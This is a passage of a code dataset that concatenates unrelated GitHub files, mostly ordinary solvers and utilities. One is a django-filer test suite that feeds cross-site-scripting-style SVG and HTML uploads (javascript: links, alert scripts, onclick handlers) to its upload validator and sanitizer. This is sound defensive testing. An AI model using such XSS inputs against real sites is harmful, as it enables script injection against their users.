count//2))","repo_name":"eunzi-kim/CODE_Practice","sub_path":"SWEA/D3/10580.py","file_name":"10580.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74329260625","text":"import pickle\nimport time\n\nimport gensim\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport nltk\nimport numpy as np\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom selenium import webdriver\nfrom TedTalksFunctions import *\n########################################################\n\ndef search_function(sims, search_words):\n query_doc = [w.lower() for w in word_tokenize(search_words)]\n# print(query_doc) # remove later\n query_doc_bow = dictionary.doc2bow(query_doc)\n# print(query_doc_bow) # remove later\n query_doc_tf_idf = tf_idf[query_doc_bow]\n# print(query_doc_tf_idf) # remove later\n ans = sims[query_doc_tf_idf]\n ind = np.argmax(ans)\n print('INDEX = ', ind)\n return ind\n\n\n# def preprocess(data):\n# lemmatized = [lemmadata(speech) for speech in data]\n# tfidf = pickle.load(open(\"tfidf.pkl\", \"rb\"))\n# transformed = tfidf.transform(lemmatized)\n# tfidf_df = pd.DataFrame(transformed.toarray(), columns=tfidf.get_feature_names())\n# relevant = pickle.load(open(\"relevantwords.pkl\", \"rb\"))\n# testset = [tfidf_df[word] for word in relevant if word in tfidf_df.columns]\n# return pd.DataFrame(testset).transpose()\n\n\ndef classify_text(text, mnb):\n listtext = [text]\n tfidf = pickle.load(open(\"tfidf.pkl\", \"rb\"))\n lemmatized = [lemmadata(speech) for speech in listtext]\n transformed = tfidf.transform(lemmatized)\n tfidf_df = pd.DataFrame(transformed.toarray(), columns=tfidf.get_feature_names())\n relevant = pickle.load(open(\"relevantwords.pkl\", \"rb\"))\n testset = [tfidf_df[word] for word in relevant if word in tfidf_df.columns]\n processed = 
pd.DataFrame(testset).transpose()\n return mnb.predict(processed)\n\n\nsimple_data = pd.read_pickle('simplified_data.pkl')\nsims = pd.read_pickle('sims.pkl')\npolarity_transcript = pd.read_pickle('polarity_transcript.pkl')\nmnb = pd.read_pickle('mnbb.pkl')\n\n# test out with whole texts from df\nsample_text = simple_data.text.iloc[2]\nprint(sample_text)\nnum = ''\nnum2 = ''\nchoice = ''\nplt.rcParams['figure.figsize'] = [10, 6] # for polarity transcript's display\nwhile num != '1' and num != '2':\n num = input('Enter\\n1 for TEDTalks Search\\n2 for TEDTalks Classifier: ')\n if num == '1':\n while num2 != '1' and num2 != '2':\n num2 = input('Enter\\n1 to Search by Description\\n2 to Search by Speech Transcript: ')\n if num2 == '1':\n choice = 'description'\n elif num2 == '2':\n choice = 'text'\n #search_words = input('Enter Search Term(s): ')\n search_words = sample_text # test queries\n idx = search_function(simple_data[choice], search_words)\n #pd.set_option('max_colwidth', 500)\n\n print(pd.DataFrame(simple_data.iloc[idx].T)) # print result.transposed\n driver = webdriver.Chrome()\n driver.get(simple_data['public_url'].iloc[idx])\n play = driver.find_element_by_xpath('//*[@id=\"plyr-play\"]')\n time.sleep(3)\n play.click()\n # Show the plot for one speech (to be built on top of...)\n plt.plot(polarity_transcript[idx])\n #plt.title(simple_data.headline[ind])\n plt.show()\n elif num == '2':\n search_words = input('Enter Search Term(s): ')\n result = classify_text(search_words, mnb)\n if result == [1]:\n print(\"One of Jay's favorite topics!\")\n else:\n print(\"Not one of Jay's favorite topics\")","repo_name":"jkarma0920/TEDTalksProject","sub_path":"TedTalksProject_Run.py","file_name":"TedTalksProject_Run.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73352975186","text":"from brainscore_core.metrics import Score\n\n\ndef ceiling_normalize(raw_score: Score, ceiling: Score) -> Score:\n # normalize by ceiling, but not above 1\n score = raw_score / ceiling\n score.attrs['raw'] = raw_score\n score.attrs['ceiling'] = ceiling\n if score > 1 or score < 0:\n out_of_range_value = score.item()\n # ideally we would just update the value, but I could not figure out how to update a scalar DataArray\n attrs = score.attrs\n in_range_value = 1 if score > 1 else 0\n score = type(score)(in_range_value, coords=score.coords, dims=score.dims)\n score.attrs = attrs\n score.attrs['original_out_of_range_score'] = out_of_range_value\n return score\n","repo_name":"brain-score/language","sub_path":"brainscore_language/utils/ceiling.py","file_name":"ceiling.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"43416802917","text":"# 연결된 모든 노드의 색을 변경한다..?\r\n# 만약 이미 색칠이 되어 있는데 칠해야하는 색과 다른 색이 칠해져있다면 False를 return하면 될 것.\r\nfrom collections import deque\r\nimport sys\r\ninput = sys.stdin.readline\r\nT = int(input())\r\nfor test_case in range(T):\r\n n,m = map(int,input().split())\r\n graph = {i+1 :[] for i in range(n)}\r\n # paint_color = [False for _ in range(n+1)]\r\n # print(graph)\r\n for _ in range(m):\r\n x,y = map(int,input().split())\r\n graph[x].append(y)\r\n graph[y].append(x)\r\n visited = [-1 for _ in range(n+1)]\r\n try:\r\n DEFAULT_COLOUR = True\r\n while -1 in visited[1:]:\r\n root_index = visited[1:].index(-1) + 1\r\n queue = deque([(root_index,DEFAULT_COLOUR)])\r\n # print(queue)\r\n while 
queue:\r\n if -1 not in visited[1:]: # 무한루프 방지\r\n break\r\n node, color = queue.popleft()\r\n # queue.(graph[node])\r\n for child in graph[node]:\r\n if visited[child] == -1:\r\n queue.append((child,not color))\r\n elif visited[child] == color:\r\n raise()\r\n if visited[node] != -1 and visited[node] != color: # 불가능할때의 조건\r\n raise()\r\n visited[node] = color\r\n print(\"possible\")\r\n except:\r\n print(\"impossible\")","repo_name":"Guitarboyjason/Algorithm","sub_path":"백준/Gold/13265. 색칠하기/색칠하기.py","file_name":"색칠하기.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16938296323","text":"#!/usr/bin/python3\n\"\"\"Create a class of complex square\"\"\"\n\n\nclass Square:\n \"\"\"Define a square\"\"\"\n def __init__(self, size=0, position=(0, 0)):\n\n \"\"\"Initialize the size of the square, raises TypeError\n if size is not an int\n Args:\n size: the size of the square\"\"\"\n self.size = size\n self.__position = position\n self.position = position\n\n def area(self):\n \"\"\"Compute the area of the square\n Return: the area of the square\"\"\"\n\n return self.__size**2\n\n @property\n def position(self):\n \"\"\"Return the tuple whose value is in protected value position\"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"Set/change the value of the variable in position\n Args:\n value: the value of the position field; it must be a tuple\n Raise:\n TypeError - if the variable is not tuple\n \"\"\"\n if not isinstance(value, tuple):\n raise TypeError('position must be a tuple of 2 positive integers')\n if len(value) != 2:\n raise TypeError('position must be a tuple of 2 positive integers')\n if not isinstance(value[0], int) or not isinstance(value[1], int):\n raise TypeError('position must be a tuple of 2 positive integers')\n if value[0] < 0 or value[1] < 0:\n raise TypeError('position must be a tuple of 2 positive integers')\n self.__position = value\n\n @property\n def size(self):\n \"\"\"Return the value stored in variable size\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"change the value stored in private variable size\n Args:\n value: new value of size\n \"\"\"\n if type(value) is not int:\n raise TypeError('size must be an integer')\n elif value < 0:\n raise ValueError('size must be >= 0')\n self.__size = value\n\n def my_print(self):\n \"\"\"Print the square out using '#'\"\"\"\n i = 0\n while i < self.size:\n j, x = 0, 0\n for a in range(0, self.position[1]):\n print(\"\")\n if self.position[1] <= 0:\n while x < self.position[0]:\n print(\" \", end=\"\")\n x += 1\n\n while j < self.size:\n print(\"#\", end=\"\")\n j += 1\n print(\"\")\n i += 1\n\n if self.__size == 0:\n print(\"\")\n","repo_name":"Sonlowami/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1340976856","text":"# -*- coding: utf-8 -*-\n\"\"\"\nauthor:rhelenius\n\"\"\"\n\nfrom lxml import etree\nfrom spellchecker import SpellChecker\nimport re\n\ndef spellcheck_workbook(wbname):\n '''\n This will take in a workbook and check titles and text box objects for spelling errors. If errors are found\n it will tell you the text string, which word was flagged and where it was located. 
It is currently avoiding\n processing tooltips because of their messy representation in the XML, but may be implemented later.\n '''\n #Read workbook xml and instatiate spellchecker\n tree = etree.parse(wbname)\n root = tree.getroot()\n spell = SpellChecker()\n\n def find_errors(objecttype):\n '''\n This will take in a object type to find the element, parent path to get attributes from, and checks their \n spelling for errors. Right now it supports dashboards or worksheets. In the future this could be expanded \n to include additional types of objects/paths.\n '''\n elempath = './/dashboard/zones//formatted-text/run' if objecttype == 'textbox' else './/worksheet//title/formatted-text/run'\n elemparent = 'ancestor::dashboard' if objecttype == 'textbox' else 'ancestor::worksheet'\n for w in root.findall(elempath):\n elemtype = 'dashboard' if objecttype == 'dashboard' else 'worksheet'\n words = re.sub(r'[^\\w\\s]','',w.text)\n misspelled_ws = spell.unknown(words.split())\n if len(misspelled_ws) > 0:\n print('{} text: '.format(objecttype) + w.text)\n for word in misspelled_ws:\n print('Flagged word: ' + word)\n print('Suggested replacement: ' + spell.correction(word))\n for parent in w.xpath(elemparent):\n print('Found in {}: '.format(elemtype) + parent.attrib['name'])\n print('\\n')\n\n #let's call find_errors for worksheets and dashboards\n find_errors('title')\n find_errors('textbox')","repo_name":"gembox/TableauFunctions","sub_path":"spellcheck_workbook.py","file_name":"spellcheck_workbook.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4033548643","text":"#!/usr/bin/python3\n\nfrom CodeGenerator import *\nfrom argparse import *\nfrom os import system\n\nargp = ArgumentParser()\nargp.add_argument(\"-f\", help=\"File\", dest=\"src_name\")\nargp.add_argument(\"-o\", help=\"Output C filename\", default='out.c', dest=\"out_name\")\nargp.add_argument(\"-b\", help=\"Begin offset\", default=0, dest=\"begin_off\")\nargp.add_argument(\"-e\", help=\"End offset\", default=0, dest=\"end_off\")\nargp.add_argument(\"-use-flags\", help=\"Select flags to use\", default='czao', dest=\"flags_used\")\n\n\nargs = vars(argp.parse_args())\n\nfilename = args['src_name']\nflagsUsed = [x for x in args['flags_used']]\nbegin, end = (int(args['begin_off'], 16), int(args['end_off'], 16) )\n\nif filename == None:\n argp.print_help()\n exit(0)\n\ncg = CodeGenerator(filename, begin, end, flagsUsed)\n\ncCode = cg.getAsC()\n\nout = open('out.c', 'wb')\nout.write(bytes(cCode, encoding='ascii'))\nout.close()\n\nprint('==== translated... 
====')\nprint(cCode)\n\n#system(\"gcc out.c -o out\")\n\n\n\n\n","repo_name":"rdbv/cisol","sub_path":"cisol.py","file_name":"cisol.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"48"} +{"seq_id":"22350086739","text":"\"\"\"\nutils for processing datasets of format described in https://github.com/iejMac/clip-video-encode/pull/13\n\nused https://github.com/rom1504/laion-prepro/blob/main/laion5B/usage_guide/dataloader_pytorch.py as template\n\"\"\"\n\nimport io\nimport json\n\nimport numpy as np\nimport open_clip\nimport torch\nimport webdataset as wds\n\nfrom torch.utils.data import DataLoader\n\n\ndef standardize_embedding_shape(emb, seq_len):\n if len(emb) > seq_len:\n print(f\"Warning: Raw embedding is longer than standard sequence length ({len(emb)} > {seq_len})\")\n emb = emb[:seq_len]\n\n pad = np.zeros((seq_len - len(emb), emb.shape[1]), dtype=emb.dtype)\n zero_mask = np.concatenate([np.ones(len(emb)), np.zeros(len(pad))])\n padded_emb = np.concatenate([emb, pad])\n return padded_emb, zero_mask\n\n\ndef create_embeddingwebdataset(\n urls,\n embedding_transform=lambda emb: emb,\n standard_seq_len=-1,\n to_tensor=True,\n enable_text=True,\n enable_meta=True,\n):\n \"\"\"\n Create a WebDataset reader for Frame Embedding Dataset\n\n Input:\n standard_seq_len: sequence length to pad all embedding sequences to (for batching)\n !(-1) : pad to standard_seq_len\n -1: don't pad (dataset can't be used in DataLoader with batch_size > 1)\n enable_text: include text captions\n enable_meta: include metadata\n \"\"\"\n\n dataset = wds.WebDataset(urls)\n # TODO: different tokeinzers??\n def tokenizer(text):\n return open_clip.tokenize([text])[0]\n\n def preprocess_dataset(item):\n output = {}\n\n npy_data = item[\"npy\"]\n stream = io.BytesIO(npy_data)\n emb = np.lib.format.read_array(stream)\n\n if standard_seq_len != -1:\n emb, zero_mask = standardize_embedding_shape(emb, standard_seq_len)\n output[\"zero_mask\"] = zero_mask\n if to_tensor:\n emb = torch.from_numpy(emb)\n\n output[\"embeddings\"] = embedding_transform(emb)\n\n if enable_text:\n text_data = item[\"txt\"]\n text = text_data.decode(\"utf-8\")\n output[\"text\"] = text\n output[\"text_tokens\"] = tokenizer(text)\n if enable_meta:\n meta_data = item[\"json\"]\n meta = json.loads(meta_data)\n # meta = meta_data.decode(\"utf-8\")\n output[\"meta\"] = meta\n return output\n\n transformed_dataset = dataset.map(preprocess_dataset, handler=wds.handlers.warn_and_continue)\n return transformed_dataset\n\n\ndef dataset_to_dataloader(dataset, batch_size, num_prepro_workers):\n \"\"\"converts WebDataset to PyTorch DataLoader.\"\"\"\n\n dl = DataLoader(\n dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=num_prepro_workers,\n pin_memory=True,\n prefetch_factor=2,\n )\n\n return dl\n\n\nclass EmbeddingWebDatasetReader:\n \"\"\"WebDataset reader for Embedding Datasets\"\"\"\n\n def __init__(\n self,\n urls,\n standard_seq_len,\n batch_size,\n num_prepro_workers,\n to_tensor=True,\n enable_text=True,\n enable_meta=False,\n embedding_transform=lambda emb: emb,\n ):\n self.batch_size = batch_size\n dataset = create_embeddingwebdataset(\n urls,\n embedding_transform,\n standard_seq_len,\n to_tensor,\n enable_text,\n enable_meta,\n )\n self.dataloader = dataset_to_dataloader(dataset, batch_size, num_prepro_workers)\n\n def __iter__(self):\n for batch in self.dataloader:\n yield 
batch\n","repo_name":"iejMac/clip-video-encode","sub_path":"clip_video_encode/dataset/dataset_reader.py","file_name":"dataset_reader.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"48"} +{"seq_id":"30331394688","text":"import collections\nimport itertools\n\n\ndef main(text, simple):\n lines = text.splitlines()\n if simple:\n S = lambda line: {v for v in collections.Counter(line).values()}\n a, b = zip(*[(2 in s, 3 in s) for line in lines for s in [S(line)]])\n print(sum(a) * sum(b))\n else:\n for A, B in itertools.combinations(lines, 2):\n same = ''.join(a for a, b in zip(A, B) if a == b)\n if len(A) - len(same) == 1:\n print(same)\n return\n","repo_name":"RodericDay/advent2018","sub_path":"y2018/p02.py","file_name":"p02.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30464713782","text":"# Este codigo ha sido generado por el modulo psexport 20180802-w32 de PSeInt.\r\n# Es posible que el codigo generado no sea completamente correcto. Si encuentra\r\n# errores por favor reportelos en el foro (http://pseint.sourceforge.net).\r\n\r\n\r\nif __name__ == '__main__':\r\n\t# Descripcion: progama que lee nombre del usuario, horas trabajadas, precio de la hora e impuestos a pagar y da como resultado el salario bruto y el salario neto.\r\n\t# Desarrollado por: Juan Martin Betancur //\r\n\t# Version 1.0 //\r\n\t# Fecha ultima actualizacion: 25/02/2023 // \r\n\t# AREA DEFINICION DE VARIABLES //\r\n\thorat = float()\r\n\tpreciot = float()\r\n\timpue = float()\r\n\tsalariob = float()\r\n\ttasas = float()\r\n\tsalarion = float()\r\n\t# AREA DE CAPTURA DE DATOS //\r\n\tprint(\"escriba su nombre: \")\r\n\tnom = input()\r\n\tprint(\"digite la cantidad de horas trabajadas: \")\r\n\thorat = float(input())\r\n\tprint(\"Digite el precio de la hora trabajada: \")\r\n\tpreciot = float(input())\r\n\tprint(\"Digite el porcentaje del valor de los impuestos: \")\r\n\timpue = float(input())\r\n\t# AREA DE CALCULOS // \r\n\tsalariob = (horat*preciot)\r\n\ttasas = (impue*salariob)\r\n\tsalarion = (salariob-tasas)\r\n\t# AREA DE SALIDA //\r\n\tprint(nom,\" Su salario neto es de: \",salarion,\" pesos\")\r\n\r\n","repo_name":"juamar07/fundamentos-programacion","sub_path":"Python/problema_1 fp.py","file_name":"problema_1 fp.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4669117484","text":"import numpy as np\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass BingoSet:\n numbers: set\n val: int = 0\n\n\nclass BingoBoard:\n def __init__(self, board: np.ndarray):\n self.board = board\n self.numbers = set(board.flatten())\n self.drawn = set()\n self.win = len(board)\n\n # diag1 = board.diagonal()\n # diag2 = np.fliplr(board).diagonal()\n # bingosets = [BingoSet(set(diag1)), BingoSet(set(diag2))]\n bingosets = []\n\n for row in board:\n bingosets.append(BingoSet(set(row)))\n\n for col in board.transpose():\n bingosets.append(BingoSet(set(col)))\n\n self.bingosets = bingosets\n\n def check_win(self):\n return any(bingoset.val >= self.win for bingoset in self.bingosets)\n\n def add_number(self, number):\n self.drawn.add(number)\n for bingoset in self.bingosets:\n bingoset.val += 1 if number in bingoset.numbers else 0\n\n def calc_score(self, win_number):\n return sum(self.numbers - self.numbers.intersection(self.drawn)) 
* win_number\n\n\ndef setup_bingo(fn):\n with open(fn, \"r\") as f:\n numbers_drawn = f.readline().strip().split(\",\")\n rest = f.read()\n\n numbers_drawn = [int(drawn) for drawn in numbers_drawn]\n boards = rest.split(\"\\n\\n\")\n\n board_list = []\n for board_raw in boards:\n board = []\n rows = board_raw.split(\"\\n\")\n for row in rows:\n row = row.split()\n row = [int(numb) for numb in row]\n if row:\n board.append(row)\n\n bingo_board = BingoBoard(np.array(board))\n board_list.append(bingo_board)\n\n return numbers_drawn, board_list\n\n\ndef play_bingo(fn):\n numbers_drawn, board_list = setup_bingo(fn)\n\n for number in numbers_drawn:\n for board in board_list:\n board.add_number(number)\n if board.check_win():\n print(f\"Score: {board.calc_score(number)}, winning number: {number}\")\n return\n\n print(\"NO ONE WON\")\n\n\ndef play_bingo_p2(fn):\n numbers_drawn, board_list = setup_bingo(fn)\n\n needed_wins = len(board_list)\n current_wins = 0\n board_list = [[board, 0] for board in board_list]\n\n for number in numbers_drawn:\n for i, (board, has_win) in enumerate(board_list):\n board.add_number(number)\n if not has_win and board.check_win():\n current_wins += 1\n board_list[i][1] = 1\n\n if current_wins == needed_wins:\n print(f\"Score: {board.calc_score(number)}, winning number: {number}\")\n return\n\n print(\"NO ONE WON\")\n","repo_name":"ProgHaj/AdventOfCode2021","sub_path":"4/bingo.py","file_name":"bingo.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9599454402","text":"import os\n\nfrom . import env\nfrom . import gbp\n\n\ndef get_branch(repo, dist, dist_id=None):\n # see if config-file gives a branch:\n option = '%s-branch' % dist\n if gbp.has_option(option):\n branch_name = gbp.get(option)\n if hasattr(repo.heads, branch_name):\n return getattr(repo.heads, branch_name)\n else:\n raise RuntimeError('%s: Branch does not exist.' % branch_name)\n\n # see if dist-name branch exists:\n if hasattr(repo.heads, dist):\n print(\"WARNING: branches are deprecated. 
\"\n \"Use / instead\")\n return getattr(repo.heads, dist)\n if dist_id:\n branchname = '%s/%s' % (dist_id, dist)\n if hasattr(repo.heads, branchname):\n return getattr(repo.heads, branchname)\n if hasattr(repo.heads, 'debian/%s' % dist):\n return getattr(repo.heads, 'debian/%s' % dist)\n if hasattr(repo.heads, 'ubuntu/%s' % dist):\n return getattr(repo.heads, 'ubuntu/%s' % dist)\n\n return None\n\n\ndef get_version(dist):\n \"\"\"Get the version to build for the given distribution.\"\"\"\n\n changelog_fields = env.get_changelog_fields()\n version = changelog_fields['version']\n\n if gbp.getboolean('append-dist'):\n release = env.get_release(dist)\n\n if release:\n return True, '%s~%s' % (version, release)\n\n return False, version\n\n\ndef postexport_cmds(dist):\n cmds = []\n env.test_dir()\n\n update, version = get_version(dist)\n if update:\n regex = '1s/(.*)/(%s)/' % version\n cmds.append('sed -i \"%s\" debian/changelog' % regex)\n\n return cmds\n\n\ndef get_changes_file(dist, arch):\n changelog_fields = env.get_changelog_fields()\n version = get_version(dist)[1]\n if ':' in version: # epoch is not part of the changes file\n version = version.split(':', 1)[1]\n\n changes = '%s_%s_%s.changes' % (changelog_fields['package'], version, arch)\n path = os.path.join(os.path.expanduser('~/build'), '%s-%s' % (dist, arch))\n return os.path.join(path, changes)\n","repo_name":"mathiasertl/dpkg-scripts","sub_path":"dpkg/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11656739644","text":"# Given an array of n positive integers. Write a program to find the sum of maximum sum subsequence of the given array such that the integers in the subsequence are sorted in increasing order.\n\n# Input:\n\n# The first line of input contains an integer T denoting the number of test cases.\n# The first line of each test case is N,N is the size of array.\n# The second line of each test case contains N input A[].\n\n# Output:\n\n# Print the sum of maximum sum sequence of the given array.\n\n# Constraints:\n\n# 1 ≤ T ≤ 100\n# 1 ≤ N ≤ 100\n# 1 ≤ A[] ≤ 1000\n\n# Example:\n\n# Input:\n# 2\n# 7\n# 1 101 2 3 100 4 5\n# 4\n# 10 5 4 3\n\n# Output:\n# 106\n# 10\n\n# Explanation:\n# For input:\n# 7\n# 1 101 2 3 100 4 5\n# All the increasing subsequences : (1,101); (1,2,3,100); (1,2,3,4,5), out of this (1,2,3,100) has maximum sum,i.e., 106. 
Hence the output is stated as 106.\n\ndef maximum_sum_subsequence(arr,n):\n \n subsequence_sum = [0]*len(arr)\n for i in range(0,n):\n if i == 0 :\n subsequence_sum[i] = arr[i]\n continue\n j = i-1\n subsequence_sum[i] = arr[i]\n while(j>-1):\n if arr[j]subsequence_sum[i]:\n subsequence_sum[i] = subsequence_sum[j]+arr[i]\n j = j-1\n return max(subsequence_sum)\n \n\nt = int(input())\n\nfor i in range(0,t):\n n = int(input())\n arr = [int(x) for x in input().strip().split(\" \")]\n print(maximum_sum_subsequence(arr,n))","repo_name":"amitkmr/coding-questions","sub_path":"Arrays/maximum_sum_increasing_subsequence.py","file_name":"maximum_sum_increasing_subsequence.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"31728470397","text":"import json\n\n\nclass local_str:\n def __init__(self, lang: str = \"en\", main_path: str = \"./\"):\n self.lang = lang\n self.main_path = main_path\n pass\n\n def load_data(self, data):\n for key in data:\n self.__setattr__(key, data[key])\n\n def __setattr__(self, name, val):\n super().__setattr__(name, val)\n\n def __getattr__(self, name):\n \"If the attribute is not loaded, return the value in English.\"\n\n with open(f\"{self.main_path}/localizations/en.json\") as f:\n data = json.load(f)\n return data[name]\n\n\ndef localized_str(lang: str, main_path: str) -> local_str:\n localized = local_str(lang, main_path)\n try:\n with open(f\"{main_path}/localizations/{lang}.json\", encoding=\"utf-8\") as f:\n data = json.load(f)\n localized.load_data(data)\n except FileNotFoundError:\n with open(f\"{main_path}/localizations/en.json\") as f:\n data = json.load(f)\n localized.load_data(data)\n return localized\n","repo_name":"Jim137/Tenhou-Paifu-Logger","sub_path":"paifulogger/src/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"20827423002","text":"import json\nimport os\n\nimport django.core\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.utils.crypto import get_random_string\n\nfrom filer.models import File, Folder\nfrom filer.validation import FileValidationError, validate_upload, sanitize_svg\nfrom tests.helpers import create_superuser\n\n\nclass TestValidators(TestCase):\n\n def setUp(self) -> None:\n self.superuser = create_superuser()\n self.client.login(username='admin', password='secret')\n self.folder = Folder.objects.create(name='foo')\n\n def tearDown(self) -> None:\n self.folder.delete()\n\n svg_file = \"\"\"\n\n\n \n {}\n\"\"\"\n\n def test_html_upload_fails(self):\n html_file = 'test_file.html'\n filename = os.path.join(\n settings.FILE_UPLOAD_TEMP_DIR,\n html_file\n )\n\n with open(filename, 'wb') as fh:\n fh.write(b\"\")\n self.assertEqual(File.objects.count(), 0)\n\n with open(filename, 'rb') as fh:\n file_obj = django.core.files.File(fh)\n url = reverse('admin:filer-ajax_upload', kwargs={'folder_id': self.folder.pk})\n post_data = {\n 'Filename': html_file,\n 'Filedata': file_obj,\n 'jsessionid': self.client.session.session_key\n }\n response = self.client.post(url, post_data)\n\n self.assertContains(response, \"HTML upload denied by site security policy\")\n self.assertEqual(File.objects.count(), 0)\n\n def test_svg_upload_fails(self):\n for attack, expected_files in [\n (\"\"\"test\"\"\", 0),\n ('', 0),\n 
(\"\"\"\"\"\", 0),\n (\"\", 1)\n ]:\n svg_file = 'test_file.svg'\n filename = os.path.join(\n settings.FILE_UPLOAD_TEMP_DIR,\n svg_file\n )\n\n # create svg file with attack vector\n with open(filename, 'w') as fh:\n fh.write(self.svg_file.format(attack))\n n = File.objects.count()\n\n with open(filename, 'rb') as fh:\n file_obj = django.core.files.File(fh)\n url = reverse('admin:filer-ajax_upload', kwargs={'folder_id': self.folder.pk})\n post_data = {\n 'Filename': svg_file,\n 'Filedata': file_obj,\n 'jsessionid': self.client.session.session_key\n }\n response = self.client.post(url, post_data)\n if expected_files == 0:\n self.assertContains(response, \"Rejected due to potential cross site scripting vulnerability\")\n self.assertEqual(File.objects.count(), n + expected_files)\n\n def test_deny_validator(self):\n from filer.validation import deny\n\n self.assertRaisesRegex(\n FileValidationError,\n \"HTML upload denied by site security policy\",\n deny,\n \"test.html\",\n None,\n None,\n \"text/html\",\n )\n\n self.assertRaisesRegex(\n FileValidationError,\n \"MY_FUNNY_EXT upload denied by site security policy\",\n deny,\n \"test.my_funny_ext\",\n None,\n None,\n \"text/html\",\n )\n\n self.assertRaisesRegex(\n FileValidationError,\n \"Upload denied by site security policy\",\n deny,\n \"test\",\n None,\n None,\n \"text/html\",\n )\n\n def test_svg_sanitizer(self):\n config = apps.get_app_config(\"filer\")\n svg_validation = config.FILE_VALIDATORS[\"image/svg+xml\"]\n config.FILE_VALIDATORS[\"image/svg+xml\"] = [sanitize_svg]\n for attack, disallowed in [\n (\"\"\"test\"\"\", \"javascript:\"),\n ('', \"alert\"),\n (\"\"\"\"\"\", \"onclick\"),\n ]:\n svg_file = 'test_file.svg'\n filename = os.path.join(\n settings.FILE_UPLOAD_TEMP_DIR,\n svg_file\n )\n\n # create svg file with attack vector\n with open(filename, 'w') as fh:\n fh.write(self.svg_file.format(attack))\n\n with open(filename, 'rb') as fh:\n file_obj = django.core.files.File(fh)\n url = reverse('admin:filer-ajax_upload', kwargs={'folder_id': self.folder.pk})\n post_data = {\n 'Filename': svg_file,\n 'Filedata': file_obj,\n 'jsessionid': self.client.session.session_key\n }\n response = self.client.post(url, post_data)\n file_id = json.loads(response.content.decode(\"utf-8\"))[\"file_id\"]\n img = File.objects.get(pk=file_id)\n content = img.file.file.read().decode(\"utf-8\")\n self.assertNotIn(disallowed, content)\n\n config.FILE_VALIDATORS[\"image/svg+xml\"] = svg_validation\n\n\nclass TestWhitelist(TestCase):\n def setUp(self) -> None:\n self.superuser = create_superuser()\n self.client.login(username='admin', password='secret')\n self.folder = Folder.objects.create(name='foo')\n self.config = apps.get_app_config(\"filer\")\n self.MIME_TYPE_WHITELIST = self.config.MIME_TYPE_WHITELIST\n\n def tearDown(self) -> None:\n self.folder.delete()\n self.config.MIME_TYPE_WHITELIST = self.MIME_TYPE_WHITELIST\n\n def set_whitelist(self, whitelist):\n self.config.MIME_TYPE_WHITELIST = whitelist\n\n def test_no_whitelist(self):\n self.set_whitelist([])\n for i in range(10):\n mime_type = get_random_string(6) + \"/\" + get_random_string(5)\n\n # If this throws an error, the test fails\n validate_upload(f\"test.{mime_type.split('/')[-1]}\", None, None, mime_type)\n\n def test_whitelist(self):\n self.set_whitelist([\"text/*\", \"image/x-png\"])\n\n expectation = {\n \"text/plain\": \"ok\",\n \"text/html\": \"fail\", # OK by whitelist but blocked by html validator\n \"image/x-png\": \"ok\",\n \"image/jpeg\": \"fail\",\n }\n\n for mime_type, 
expected_result in expectation.items():\n if expected_result == \"ok\":\n try:\n validate_upload(\"test-file\", None, None, mime_type)\n except FileValidationError:\n self.assertFalse(f\"Mime type {mime_type} expected to pass\")\n else:\n with self.assertRaises(FileValidationError):\n validate_upload(\"test-file\", None, None, mime_type)\n","repo_name":"django-cms/django-filer","sub_path":"tests/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":1653,"dataset":"github-code","pt":"48"} +{"seq_id":"26000293005","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n\n path(\"create-lot\", views.new_lot, name=\"new_lot\"),\n path(\"lot/\", views.lot_view, name=\"lot_view\"),\n path(\"toggle_watchlist//\", views.toggle_watchlist, name=\"toggle_watchlist\"),\n path(\"watchlist\", views.watchlist, 